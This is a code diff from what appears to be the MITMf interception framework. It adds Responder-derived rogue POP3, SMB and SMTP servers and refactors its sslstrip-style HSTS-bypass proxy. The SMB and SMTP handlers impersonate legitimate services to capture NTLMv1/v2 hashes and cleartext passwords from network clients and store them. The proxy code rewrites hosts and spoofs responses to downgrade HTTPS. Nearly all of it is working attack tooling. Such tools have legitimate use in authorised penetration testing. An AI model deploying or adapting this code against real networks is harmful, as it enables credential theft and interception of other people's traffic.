'user': User,
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
data = self.SendPacketAndRead()
else:
data = self.SendPacketAndRead()
except Exception:
pass
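A minimal way to exercise this handler from the client side (a sketch only, assuming the rogue server is reachable on 127.0.0.1:110; poplib is in the Python 2 standard library and the credentials are made up):
import poplib
pop = poplib.POP3('127.0.0.1', 110)    # reads the +OK greeting sent by SendPacketAndRead()
pop.user('alice')                      # handler sees "USER alice" and answers +OK
pop.pass_('secret')                    # handler sees "PASS secret", calls SaveToDb(), answers +OK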

433  core/servers/SMB.py  Normal file
@@ -0,0 +1,433 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import threading
import socket
from random import randrange
from core.responder.packets import SMBHeader, SMBNegoAnsLM, SMBNegoAns, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.utils import *
class SMB:
def start(self):
try:
#if OsInterfaceIsSupported():
# server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
# server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
#else:
server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Detect if SMB auth was Anonymous
def Is_Anonymous(data):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
if SecBlobLen < 260:
LMhashLen = struct.unpack('<H',data[89:91])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
if SecBlobLen > 260:
LMhashLen = struct.unpack('<H',data[93:95])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
def Is_LMNT_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
packet = data
try:
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:16]])
if Dialect[0] == "NT LM 0.12":
return "\x00\x00"
if Dialect[1] == "NT LM 0.12":
return "\x01\x00"
if Dialect[2] == "NT LM 0.12":
return "\x02\x00"
if Dialect[3] == "NT LM 0.12":
return "\x03\x00"
if Dialect[4] == "NT LM 0.12":
return "\x04\x00"
if Dialect[5] == "NT LM 0.12":
return "\x05\x00"
if Dialect[6] == "NT LM 0.12":
return "\x06\x00"
if Dialect[7] == "NT LM 0.12":
return "\x07\x00"
if Dialect[8] == "NT LM 0.12":
return "\x08\x00"
if Dialect[9] == "NT LM 0.12":
return "\x09\x00"
if Dialect[10] == "NT LM 0.12":
return "\x0a\x00"
if Dialect[11] == "NT LM 0.12":
return "\x0b\x00"
if Dialect[12] == "NT LM 0.12":
return "\x0c\x00"
if Dialect[13] == "NT LM 0.12":
return "\x0d\x00"
if Dialect[14] == "NT LM 0.12":
return "\x0e\x00"
if Dialect[15] == "NT LM 0.12":
return "\x0f\x00"
except Exception:
print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
print hexdump(packet)
#Set MID SMB Header field.
def midcalc(data):
pack=data[34:36]
return pack
#Set UID SMB Header field.
def uidcalc(data):
pack=data[32:34]
return pack
#Set PID SMB Header field.
def pidcalc(data):
pack=data[30:32]
return pack
#Set TID SMB Header field.
def tidcalc(data):
pack=data[28:30]
return pack
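For orientation (assuming the standard SMB1 wire layout with the 4-byte NetBIOS session header in front of the SMB header), the fixed offsets used by these helpers correspond to:
# data[0:4]   NetBIOS session header      data[4:8]    '\xffSMB' magic (start of the SMB header)
# data[28:30] TID      data[30:32] PID    data[32:34]  UID       data[34:36] MID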
def ParseShare(data):
packet = data[:]
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
if a:
settings.Config.ResponderLogger.info("[SMB] Requested Share : %s" % a.group(0).replace('\x00', ''))
#Parse SMB NTLMSSP v1/v2
def ParseSMBHash(data,client):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
BccLen = struct.unpack('<H',data[61:63])[0]
if SecBlobLen < 260:
SSPIStart = data[75:]
LMhashLen = struct.unpack('<H',data[89:91])[0]
LMhashOffset = struct.unpack('<H',data[91:93])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[97:99])[0]
NthashOffset = struct.unpack('<H',data[99:101])[0]
else:
SSPIStart = data[79:]
LMhashLen = struct.unpack('<H',data[93:95])[0]
LMhashOffset = struct.unpack('<H',data[95:97])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[101:103])[0]
NthashOffset = struct.unpack('<H',data[103:105])[0]
if NthashLen == 24:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[105:107])[0]
DomainOffset = struct.unpack('<H',data[107:109])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[113:115])[0]
UserOffset = struct.unpack('<H',data[115:117])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[109:111])[0]
DomainOffset = struct.unpack('<H',data[111:113])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[117:119])[0]
UserOffset = struct.unpack('<H',data[119:121])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
# Parse SMB NTLMv1/v2
def ParseLMNTHash(data, client):
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
if NthashLen > 25:
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
if NthashLen == 24:
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
LmHash = data[65:65+LMhashLen].encode('hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
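The two fullhash layouts assembled above correspond to the usual NetNTLM capture formats (no real values shown):
# NTLMv1: <Username>::<Domain>:<LmHash>:<NtHash>:<NumChal>            (responses first, challenge last)
# NTLMv2: <Username>::<Domain>:<NumChal>:<NtHash[:32]>:<NtHash[32:]>  (challenge, NTProofStr, then the blob)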
def IsNT4ClearTxt(data, client):
HeadLen = 36
if data[14:16] == "\x03\x80":
SmbData = data[HeadLen+14:]
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75":
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
settings.Config.ResponderLogger.info("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
# SMB Server class, NTLMSSP
class SMB1(BaseRequestHandler):
def handle(self):
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
if len(data) < 1:
break
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
# Negotiate Protocol Response
if data[8:10] == "\x72\x00":
# \x72 == Negotiate Protocol Response
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Session Setup AndX Request
if data[8:10] == "\x73\x00":
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(4096)
# STATUS_SUCCESS
if data[8:10] == "\x73\x00":
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0])
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Tree Connect AndX Request
if data[8:10] == "\x75\x00":
ParseShare(data)
# Tree Connect AndX Response
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Tree Disconnect.
if data[8:10] == "\x71\x00":
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##NT_CREATE Access Denied.
if data[8:10] == "\xa2\x00":
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Trans2 Access Denied.
if data[8:10] == "\x25\x00":
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##LogOff.
if data[8:10] == "\x74\x00":
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.timeout:
pass
# SMB Server class, old version
class SMB1LM(BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
##Negotiate proto answer.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
Body.calculate()
Packet = str(head)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Session Setup AndX Request
if data[8:10] == "\x73\x00":
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data,self.client_address[0])
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except Exception:
self.request.close()
pass

98  core/servers/SMTP.py  Normal file
@@ -0,0 +1,98 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from traceback import print_exc
from core.responder.utils import *
from base64 import b64decode, b64encode
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
class SMTP:
def start(self):
try:
if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 25), ESMTP)
server2 = ThreadingTCPServer((settings.Config.Bind_To, 587), ESMTP)
else:
server1 = ThreadingTCPServer(('', 25), ESMTP)
server2 = ThreadingTCPServer(('', 587), ESMTP)
for server in [server1, server2]:
t = threading.Thread(name='SMTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMTP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# ESMTP Server class
class ESMTP(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(SMTPGreeting()))
data = self.request.recv(1024)
if data[0:4] == "EHLO":
self.request.send(str(SMTPAUTH()))
data = self.request.recv(1024)
if data[0:4] == "AUTH":
self.request.send(str(SMTPAUTH1()))
data = self.request.recv(1024)
if data:
try:
User = filter(None, b64decode(data).split('\x00'))
Username = User[0]
Password = User[1]
except:
Username = b64decode(data)
self.request.send(str(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data)
except: Password = data
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
except Exception:
pass
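As a quick illustration of the decoding above (a sketch; AUTH PLAIN packs authzid, user and password NUL-separated into one base64 blob, while AUTH LOGIN sends user and password as two separate base64 lines; the credentials here are made up):
from base64 import b64decode
blob = 'AGFsaWNlAHNlY3JldA=='                        # base64 of '\x00alice\x00secret'
print filter(None, b64decode(blob).split('\x00'))    # -> ['alice', 'secret']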

0  core/servers/__init__.py  Normal file

@@ -16,7 +16,13 @@
# USA
#
import urlparse, logging, os, sys, random, re, dns.resolver
import urlparse
import logging
import os
import sys
import random
import re
import dns.resolver
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
@@ -33,9 +39,10 @@ from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from core.sergioproxy.ProxyPlugins import ProxyPlugins
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s [ClientRequest] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ClientRequest", formatter)
class ClientRequest(Request):
@@ -49,52 +56,45 @@ class ClientRequest(Request):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.hsts = URLMonitor.getInstance().hsts
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
#self.uniqueId = random.randint(0, 10000)
#Use are own DNS server instead of reactor.resolve()
self.resolver = URLMonitor.getInstance().getResolver()
self.customResolver = dns.resolver.Resolver()
self.customResolver.nameservers = ['127.0.0.1']
self.customResolver.port = URLMonitor.getInstance().getResolverPort()
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
#for k,v in headers.iteritems():
# mitmf_logger.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v))
if self.hsts:
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host))
log.debug("Modifying HOST header: {} -> {}".format(headers['host'], host))
headers['host'] = host
self.setHeader('Host', host)
if 'accept-encoding' in headers:
del headers['accept-encoding']
mitmf_logger.debug("Zapped encoding")
log.debug("Zapped encoding")
if 'if-modified-since' in headers:
del headers['if-modified-since']
if self.urlMonitor.caching is False:
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
self.plugins.hook()
if 'if-modified-since' in headers:
del headers['if-modified-since']
headers['pragma'] = 'no-cache'
return headers
@@ -113,17 +113,17 @@ class ClientRequest(Request):
if os.path.exists(scriptPath): return scriptPath
mitmf_logger.warning("Error: Could not find lock.ico")
log.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
log.debug("Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
path = self.getPathFromUri()
url = 'http://' + host + path
self.uri = url # set URI to absolute
self.uri = url # set URI to absolute
if self.content:
self.content.seek(0,0)
@@ -132,19 +132,19 @@ class ClientRequest(Request):
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
url = 'http://' + host + path
self.uri = url # set URI to absolute
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
if real:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
@@ -155,22 +155,19 @@ class ClientRequest(Request):
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
mitmf_logger.debug("Sending expired cookies...")
log.debug("Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
mitmf_logger.debug("Sending spoofed favicon response...")
log.debug("Sending spoofed favicon response")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url))
elif self.urlMonitor.isSecureLink(client, url):
log.debug("Sending request via SSL/TLS: {}".format(url))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else:
mitmf_logger.debug("Sending request via HTTP...")
log.debug("Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
@@ -179,7 +176,7 @@ class ClientRequest(Request):
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
mitmf_logger.debug("[ClientRequest] Host resolution error: " + str(error))
log.debug("Host resolution error: {}".format(error))
try:
self.finish()
except:
@@ -189,33 +186,33 @@ class ClientRequest(Request):
address = self.dnsCache.getCachedAddress(host)
if address != None:
mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address)))
log.debug("Host cached: {} {}".format(host, address))
return defer.succeed(address)
else:
mitmf_logger.debug("[ClientRequest] Host not cached.")
if self.resolver == 'dnschef':
try:
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
return defer.fail()
elif self.resolver == 'twisted':
log.debug("Host not cached.")
self.customResolver.port = self.urlMonitor.getResolverPort()
try:
log.debug("Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
log.debug("Exception occured, falling back to Twisted")
return reactor.resolve(host)
def process(self):
mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if self.getHeader('host') is not None:
log.debug("Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if self.hsts:
host = self.urlMonitor.URLgetRealHost("%s"%host)
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
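The dregex substitution used above maps every occurrence of a tokenized hostname back through the real dict in a single pass; a self-contained sketch of the same trick (hostnames are hypothetical):
import re
real = {'webaccounts.example.com': 'accounts.example.com'}   # hypothetical tokenized -> real mapping
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
referer = 'http://webaccounts.example.com/login'
print dregex.sub(lambda x: str(real[x.string[x.start():x.end()]]), referer)
# -> http://accounts.example.com/login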


@@ -17,8 +17,10 @@
#
import logging
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s [DnsCache] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DnsCache", formatter)
class DnsCache:
@@ -51,7 +53,7 @@ class DnsCache:
def setCustomRes(self, host, ip_address=None):
if ip_address is not None:
self.cache[host] = ip_address
mitmf_logger.debug("DNS entry set: %s -> %s" %(host, ip_address))
log.debug("DNS entry set: %s -> %s" %(host, ip_address))
else:
if self.customAddress is not None:
self.cache[host] = self.customAddress


@@ -16,12 +16,16 @@
# USA
#
import logging, re, string
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
@@ -40,7 +44,7 @@ class SSLServerConnection(ServerConnection):
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
@@ -57,11 +61,11 @@ class SSLServerConnection(ServerConnection):
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
@@ -85,13 +89,13 @@ class SSLServerConnection(ServerConnection):
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
mitmf_logger.debug("Found path-relative link in secure transmission: " + link)
mitmf_logger.debug("New Absolute path-relative link: " + absoluteLink)
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
mitmf_logger.debug("Found relative link in secure transmission: " + link)
mitmf_logger.debug("New Absolute link: " + absoluteLink)
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')


@@ -16,19 +16,26 @@
# USA
#
import logging, re, string, random, zlib, gzip, StringIO, sys
import plugins
try:
from user_agents import parse
except:
pass
import logging
import re
import string
import random
import zlib
import gzip
import StringIO
import sys
from user_agents import parse
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
from core.sergioproxy.ProxyPlugins import ProxyPlugins
from core.proxyplugins import ProxyPlugins
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
clientlog = logger().setup_logger("ServerConnection_clientlog", formatter)
formatter = logging.Formatter("%(asctime)s [ServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnection", formatter)
class ServerConnection(HTTPClient):
@@ -53,50 +60,66 @@ class ServerConnection(HTTPClient):
self.postData = postData
self.headers = headers
self.client = client
self.clientInfo = None
self.clientInfo = {}
self.plugins = ProxyPlugins()
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.app = URLMonitor.getInstance().isAppCachePoisoning()
self.plugins = ProxyPlugins.getInstance()
self.hsts = URLMonitor.getInstance().hsts
self.app = URLMonitor.getInstance().app
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getPostPrefix(self):
return "POST"
self.handle_post_output = False
def sendRequest(self):
if self.command == 'GET':
try:
user_agent = parse(self.headers['user-agent'])
